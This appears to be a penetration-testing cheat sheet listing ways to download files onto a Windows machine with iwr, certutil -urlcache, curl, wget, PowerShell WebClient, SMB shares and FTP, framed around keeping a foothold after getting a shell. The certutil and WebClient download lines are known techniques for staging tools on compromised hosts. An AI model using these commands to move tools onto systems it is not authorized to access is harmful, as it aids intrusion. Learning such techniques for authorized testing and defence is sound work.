Transferring Files To Windows

IWR

powershell.exe iwr -uri 192.168.1.1/example.txt -o C:\Temp\example.txt

There are many options in which you can change this command for your scenario. For instance, if you are already in a PowerShell prompt, you need not include the powershell.exe. Additionally, I have found the .exe in powershell.exe unnecessary. The -o flag can also be written as -OutFile.

The iwr (Invoke Web Request) command can have several other syntaxes, of which I have listed below.

Certutil

certutil.exe -urlcache -f http://192.168.1.1/example.txt example.txt

The purpose of the certutil command was originally for certificate and CA management, but by using certain flags we can use it as a built-in file transfer tool.

Curl

curl http://192.168.1.1/example.txt -o example.txt

Curl is a Linux command line tool that is now available for Windows CMD.

Wget

powershell.exe wget http://192.168.1.1/example.txt -OutFile example.txt

wget is a part of PowerShell, so if you are already in a PowerShell prompt, there is no need to include powershell.exe.

PowerShell

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/putty.exe', 'putty.exe')

Compared to iwr, this is a much more complex command. I have, however, found much success in this command where iwr may fail.

SMB

net use 192.168.1.1\share //add credential lines here
copy 192.168.1.1\share\exampe.txt

SMB can be extremely useful when you need to regularly transfer files back and forth. I have run into instances where after losing my shell, my added SMB share is no longer functional. To fix this, I simply restart my SMB server under a different name and add it as a new share.

FTP

ftp 192.168.1.1

Even if you are using FTP anonymously, you still need to enter the anonymous:anonymous credentials. Inside of FTP, you can always use the help command to see what options are available to you.